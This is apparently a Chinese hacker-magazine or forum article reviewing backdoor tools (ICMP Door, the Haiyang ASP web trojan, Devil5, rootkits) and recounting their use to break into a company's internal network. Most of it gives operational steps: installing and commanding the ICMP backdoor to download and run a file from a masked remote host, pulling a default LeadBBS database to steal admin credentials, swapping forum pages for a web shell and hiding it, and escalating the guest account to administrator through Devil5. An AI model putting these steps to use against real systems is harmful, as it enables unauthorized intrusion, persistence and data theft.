這個後門其實用途最廣的地方在於突破網關後對內網計算機的控制,因為很多機密數據都是放在內網計算機上的,而控制內網計算機並不是我們想到位的商業網路進行入侵檢測,它的網路內部並不像我們常見的內網那樣非常容易入侵和控制,因為該公司本身涉及到一些網路安全的服務,所以內網個人計算機的防護是很到位的,在嘗試過很多後門後,最後ICMP Door幫我實現了成功的滲透內網!由此筆者開始愛上這個後門。
首先使用icmpsrv.exe -install參數進行後門的安裝,再使用icmpsend.exe IP進行控制,可以用:[http://xxx.xxx.xxx/admin.exe-hkfx.exe]方式下載文件,保存在[url=file://\system32]\system32[/url]目錄下,文件名為hkfx.exe,程序名前的「-」不能省去,使用[pslist]還可以列出遠程主機的進程名稱和pid,再使用[pskill id]就可以殺進程了,同樣,輸入普通cmd命令,則遠程主機也就執行了相關的命令。 ~HF1 ? %
這個後門是採用的c/s構架,必須要使用icmpsend才能激活伺服器,但是他也有自己的先天不足:後門依靠ICMP進行通訊,經過沖擊波的洗禮後,很少有伺服器還接受ICMP包了,很多都屏蔽掉了它,所以用它來控制伺服器不是一個好辦法,這也是我為什麼用它來控制內網計算機的原因了——內網很少有人屏蔽ICMP包吧? 這是ASP腳本方面流傳非常廣的一個腳本後門了,在經過幾次大的改革後,推出了「海陽頂端ASP木馬XP版」、「海陽頂端ASP木馬紅粉佳人版」等功能強大、使用方便的後門,想必經常接觸腳本安全的朋友對這些都不會陌生。類型:網頁木馬
使用范圍:支持ASP、WEB訪問
使用難度:★☆☆☆☆
危害程序:★★★☆☆
查殺難度:★★★☆☆
伺服器系統配置都相對安全,公開的系統漏洞存在的機會很少,於是腳本方面的漏洞就開始火起來。首先我們通過某種途徑獲得一個伺服器的頁面許可權(比如利用論壇上傳達室類型未嚴格設置、SQL注入後獲得ASP系統的上傳許可權、對已知物理路徑的伺服器上傳特定程序),然後我們可以通過簡單的上傳ASP程序或者是直接復制海陽項端的代碼,然後通過WEB訪問這個程序,就能很方便地查閱伺服器上的資料了,下面舉個簡單的便子(由於只是簡單的介紹,下文便子不會太難或者太普遍,希望大家理解)。
leadbbs2.77曾經風靡網路,它是個很典型的ASP論壇,屏蔽了很多可以SQL注入的寺方,但是很多傻瓜級別的網路管理員總是喜歡默認安裝,然後啟用論壇,我們只需要很簡單地在IE中輸入:WWW。***。COM/BBS/DATA/LEADBBS。MDB就能夠直接下載該論壇的資料庫了,而且沒有MD5加密哦!,我們直接找到管理員的賬戶和密碼,然後登錄論壇,到管理界面將論壇的「聯系我們」、「幫助」等ASP文件替換成我們的海陽項端代碼,然後執行GUEST許可權的CMD命令,方便的上傳/下載將定程序、遠程執行程序等,這樣一個隱藏的後門就建好了!取得伺服器的SYSTEM許可權就看大家自己的辦法了。
一般來講,海洋的功能是非常強大的,而且不容易被查殺(一個朋友採取的方式是:先利用某個腳本漏洞上傳網頁後門,再通過海洋上傳另一個後門到隱蔽的路徑,然後通過最後上傳的後門來刪除第一次上傳的海洋,這樣後門的存放路徑就可以放得非常深了,普通管理員是很難發現的),如果管理員覺得自己可能中了這里邊樣的後門,可以利用論壇備份來恢復自己的頁面系統,再配合系統日誌、論壇日誌等程序檢查系統,發現可疑ASP文件打開看看海洋是很好識別的,再刪除就可以了。
腳本方面的後門還有CGI和PHP兩面三刀大類,使用原理都差不多,這里就不再多介紹,在黑防論壇也收錄了這三種後門,大家可以下載後自己研究。 類型:系統後門
使用范圍:win200/xp/2003
隱蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程序:★★★★☆
查殺難度:★★★☆☆
同BITS一樣,Devil5也是線程插入式的後門,和BITS不同的是它可以很方便的在GUI界面下按照自己的使用習慣定製埠和需要插入的線程,適合對系統有一定了解的使用都使用,由於是自定義插入線程,所以它更難被查殺,下面我們來看看它的使用。
道德使用它自帶的配置程序EDITDEVIL5.EXE對後門進行常規的配置,包括控制埠、插入線程、連接密碼、時間間隔等方面關鍵點是對插入線程的定製,一般設置成系統自帶的SVCHOST,然後運行後門就可以控制了。
我們用TELNET連接上去,連接的格式是:TELNET *** 定製的埠,它和其他後門不同之處在於連接後沒有提示的界面,每次執行程序也是分開的,必須要每次都有輸入密碼,比如我們丟掉了伺服器和管賬戶,可以激活GUEST後再將GUEST加到管理員許可權,記得每次執行命令後加上「>密碼」就可以了:net localgroup administrators guest /add >hkfx,然後你又可以控制伺服器了。
很明顯示,同榕哥的BITS相比,DEVIL5有一些缺陷:不能通過系統自帶埠通訊、執行命令比較麻煩,需要每次輸入密碼而且不回顯示輸入內容,很容易出錯。但是,它有自己的優勢:插入線程可以自已定製,比如設置IE的線程為插入的目標就比較難被查殺:自己提供了專門的查殺工具DELDEVIL5.exe,幫助防護者清理系統;而且它可以任意改名和綁定,使用靈活性上比BITS強……大家選擇哪能款就看自己的喜好了。
另外,PortLess BackDoor等工具也是此類的後門,功能強大,隱蔽性稍差,大家有興趣可以自己研究一下。 如果說上面的後門程序都各有千秋、各有所長的話,它們和經典的root kit 一比簡直就是小巫見大巫了,那究竟什麼樣是root kit呢?
root kit出現於20世紀90年代初,在1994年2月的一篇安全咨詢報告中首先使用了root kit這個名詞。從出現至今,root kit 的技術發展非常迅速,應用越來越廣泛,檢測難度也越來越大。其中釷對SunOS和Linux兩種操作系統的root kit最多。
很多人有一個誤解,他們認為root kit 是用作獲得系統root訪問許可權的工具。實際上,root kit是攻擊都用來隱蔽自己的蹤跡和保留root訪問許可權的工具。通常,攻擊者通過遠程攻擊獲得root訪問許可權,進入系統後,攻擊者會在侵入的主機中安裝root kit,然後他將經常通過root kit的後門檢查系統是否有其他的用戶登錄,如果只有自己,攻擊者就開始著手清理日誌中的有關信息。通過root kit的嗅探器獲得其他系統的用戶和密碼之後,攻擊者就會利用這些信息侵入其他系統。
從*nix系統上遷移到windows系統下的root kit完全沿襲了這些「可怕」的功能!網路上常見的root kit 是內核級後門軟體,用戶可以通過它隱藏文件、進程、系統服、系統驅動、注冊表鍵和鍵值、打開的埠以及虛構可用磁碟窨。程序同時也在內存中偽裝它所做的改動,並且隱身地控制被隱藏進程。程序安裝隱藏後門,注冊隱藏系統服務並且安裝系統驅動。該後門技術允許植入reDirector,是非常難以查殺的一個東東,讓很多網路管員非常頭疼!